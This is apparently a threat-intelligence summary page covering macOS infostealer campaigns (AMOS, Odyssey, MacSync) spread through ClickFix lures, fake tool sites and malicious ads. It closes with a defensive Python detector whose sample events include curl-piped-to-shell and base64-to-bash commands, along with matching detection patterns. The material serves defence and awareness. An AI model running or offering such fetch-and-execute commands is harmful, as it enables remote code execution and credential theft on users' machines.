Mallory

macOS Infostealer Campaigns Using Social Engineering and Evasion Tactics

Tags: atomic macos stealer, infostealer, malvertising, social engineering, fraudulent apps, macos, data exfiltration, odyssey stealer, fake updates, evasion, browser credentials, cracked software, shell commands, crypto wallets, terminal commands

Updated February 11, 2026 at 10:18 PM (2 sources)

Threat actors are escalating macOS infostealer activity through multiple distribution and evasion techniques aimed at harvesting sensitive user data. One campaign abuses trust in legitimate AI platforms by promoting shareable ChatGPT and Grok conversation links via Google Ads, luring users searching for common macOS troubleshooting help into running malicious Terminal commands using the “ClickFix” social-engineering pattern. Executing the provided shell commands results in installation of Atomic macOS Stealer (AMOS), which steals browser credentials, crypto wallet seed phrases, Keychain data, and personal files before exfiltrating them to attacker-controlled infrastructure.

Separately, Odyssey Stealer intrusions against macOS have surged globally, with notable targeting reported in the U.S., France, and Spain and additional impact across Europe, the Americas, and parts of Asia and Africa. Moonlock Lab reporting indicates Odyssey is delivered through fake software updates, cracked tools, and fraudulent apps, and is designed to evade detection by generating a unique fingerprint per infection, frequently changing code structure, and using many distinct SHA-256 variants—suggesting automated builders are being used to produce large numbers of hard-to-block samples. Collectively, the reporting highlights sustained pressure on macOS users from credential-stealing malware that blends high-trust lures with rapid variant generation to hinder traditional defenses.

Related Stories

Microsoft Warns macOS Infostealer Campaigns Using ClickFix Lures, Malicious DMGs, and Python Stealers

Microsoft reported that **information-stealing malware activity is expanding from Windows to macOS**, driven by campaigns observed since late 2025 that rely on social engineering and cross-platform tooling. The activity includes **ClickFix-style prompts** and **malicious DMG installers** that deliver macOS-focused infostealer families such as **Atomic macOS Stealer (AMOS)**, **MacSync**, and **DigitStealer**, with operators leveraging **fileless execution**, **native macOS utilities**, and **AppleScript automation** to evade defenses and automate collection. Initial access commonly starts with **malicious search ads (e.g., Google Ads)** that redirect users to fake sites impersonating legitimate tools and then trick victims into running “fix” steps or installing trojanized software. The malware is assessed to target high-value data including browser credentials and session cookies, **iCloud Keychain** contents, crypto wallet data, and **developer secrets**; Microsoft also highlighted growing use of **Python-based stealers** distributed via phishing for rapid adaptation across heterogeneous environments, citing **PXA Stealer** (linked to Vietnamese-speaking actors) as an example used in late-2025 campaigns with persistence mechanisms such as registry `Run` keys or scheduled tasks and **Telegram** used for command-and-control.

1 month ago
macOS Malware Campaigns Shift Toward Infostealers and Social Engineering to Bypass Apple Protections

Threat actors are increasingly targeting macOS users with **infostealers** and distribution-as-a-service models, reflecting a broader “gold rush” in Apple-focused malware development. Reporting highlights macOS stealers targeting browser credentials and cryptocurrency assets (including seed phrases) and notes tactics to evade Apple controls such as obtaining valid Apple developer signatures to bypass *Gatekeeper*; one cited example is *MacSync* being notarized and signed under Team ID `GNJLS3UYZ4`. The same reporting describes ecosystem-scale enablement, including large-scale compromise of WordPress sites for distribution and novel command-and-control approaches such as using blockchain smart contracts (e.g., on **BNB Smart Chain**), alongside paid-traffic abuse (e.g., promoting malicious AI chat content via ads) to push stealer payloads. Separately, a Darktrace-described investigation details a **multi-stage macOS malware** campaign that prioritizes *social engineering* over exploitation to defeat Apple’s **Transparency, Consent, and Control (TCC)** privacy framework. Victims are lured via phishing to open an AppleScript masquerading as a document (`Confirmation_Token_Vesting.docx.scpt`), which displays a fake “Compatibility” error and instructs the user to launch a “Compatibility Wizard” (e.g., using a keyboard shortcut) that effectively tricks them into authorizing execution and granting access. Together, the reporting indicates macOS threats are increasingly succeeding by combining credential/crypto theft objectives with user-prompt manipulation and trust-abuse techniques rather than relying on kernel or sandbox escapes.

1 month ago

Malvertising Campaign Delivers AMOS and Odyssey Stealer via Fake macOS Tool Sites

A sophisticated cybercriminal campaign has been identified targeting macOS users, particularly developers, by leveraging fake download portals that impersonate trusted platforms such as Homebrew, LogMeIn, and TradingView. The attackers have registered over 85 domains that closely mimic the legitimate sites of these popular tools, using convincing branding and user interfaces to deceive visitors. These malicious domains are promoted through Google Ads, ensuring that they appear prominently in search results and increasing the likelihood that unsuspecting users will visit them. Once on the fake sites, users are instructed to copy and execute a curl command in their Terminal, which initiates the download and installation of infostealing malware. The primary payloads delivered in this campaign are AMOS (Atomic macOS Stealer) and Odyssey Stealer, both of which are capable of harvesting sensitive information such as system details, browser data, and cryptocurrency credentials from infected machines. The campaign employs advanced social engineering tactics, including clipboard manipulation and command obfuscation, to increase the success rate of infections. Researchers from Hunt.io have mapped the infrastructure supporting this operation, noting that the attackers reuse IP addresses and SSL certificates across multiple domains, indicating a persistent and well-organized effort. The infrastructure has been active for several years, with some IP addresses registered under personal names, suggesting a degree of operational continuity and experience. The campaign does not rely on exploiting software vulnerabilities but instead exploits user trust in widely used open-source and financial tools. The use of Google Ads as a distribution vector highlights the attackers' willingness to invest in paid advertising to reach their targets. 
The campaign's focus on the developer community is particularly concerning, as compromised developer systems could lead to broader supply chain risks. Security researchers have emphasized the importance of verifying download sources and being wary of unsolicited installation instructions, especially those involving Terminal commands. The ongoing nature of the campaign, with continuous adaptation of infrastructure and tactics, underscores the need for vigilance among macOS users. The discovery of this campaign began with public reports from independent researchers, which were then corroborated and expanded upon by threat intelligence teams. The scale and persistence of the operation suggest that it is likely to continue evolving, posing a significant threat to the macOS ecosystem. Organizations are advised to educate users about the risks of malvertising and to implement technical controls to block access to known malicious domains. The campaign demonstrates the increasing sophistication of social engineering attacks targeting macOS, a platform often perceived as less vulnerable than Windows.

4 months ago
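The ClickFix pattern described in this story and in the page summary (a copied curl one-liner run in Terminal, sometimes base64-obfuscated, alongside AppleScript-driven fake dialogs) lends itself to a process-telemetry check. The following is an added example, not code from Hunt.io, Moonlock, Microsoft or any vendor product. It assumes endpoint telemetry reduced to launching app plus command line; the trusted-host allowlist and all sample events, including the `.invalid` placeholder domain, are constructed.

```python
import re
from urllib.parse import urlparse
# Hosts whose official install instructions are themselves "curl | bash" one-liners
# (Homebrew's real installer is fetched from raw.githubusercontent.com). Assumption:
# the defender maintains this allowlist for their environment.
TRUSTED_INSTALL_HOSTS = {"raw.githubusercontent.com", "brew.sh"}

# Constructed process records (launching app -> command line), the shape an EDR or
# endpoint telemetry feed would provide. The .invalid domain is a placeholder.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "cmd": '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'},
    {"parent": "Terminal", "cmd": "curl -fsSL https://homebrew-install.invalid/setup.sh | sh"},
    {"parent": "Terminal", "cmd": "echo Y29uc3RydWN0ZWQ= | base64 -d | bash"},
    {"parent": "Terminal", "cmd": "osascript -e 'display dialog \"Compatibility error\"'"},
    {"parent": "Xcode", "cmd": "git fetch origin"},
]

URL = re.compile(r"https?://[^\s)\"'|]+")
FETCH_TOOL = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b")
SHELL_DASH_C = re.compile(r"\b(?:ba|z)?sh\s+-c\b")
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")

def fetched_hosts(cmd):
    """Hostnames of every URL that appears in the command line."""
    return {urlparse(u).hostname for u in URL.findall(cmd)}

def classify(event):
    """Return the list of ClickFix-style indicators found in one process record."""
    cmd, reasons = event["cmd"], []
    runs_shell = PIPE_TO_SHELL.search(cmd) or SHELL_DASH_C.search(cmd)
    if FETCH_TOOL.search(cmd) and runs_shell:
        # Remote script execution is only suspicious when the source is not a known installer host.
        untrusted = sorted(h for h in fetched_hosts(cmd) if h not in TRUSTED_INSTALL_HOSTS)
        if untrusted:
            reasons.append(f"remote script piped into a shell from untrusted host(s): {untrusted}")
    if B64_DECODE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("base64-decoded payload piped into a shell (command obfuscation)")
    if event["parent"] == "Terminal" and "osascript -e" in cmd:
        reasons.append("inline AppleScript launched from Terminal (fake-dialog / automation pattern)")
    return reasons

def scan(events):
    """Map the index of each flagged record to its indicators."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(f"[{i}] {SAMPLE_EVENTS[i]['cmd']}\n    -> " + "; ".join(reasons))
```

The genuine Homebrew install line passes because its host is allowlisted, which is the point: the lookalike sites on this page copy the legitimate one-liner shape, so the host, not the `curl | sh` idiom, is what separates the two.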
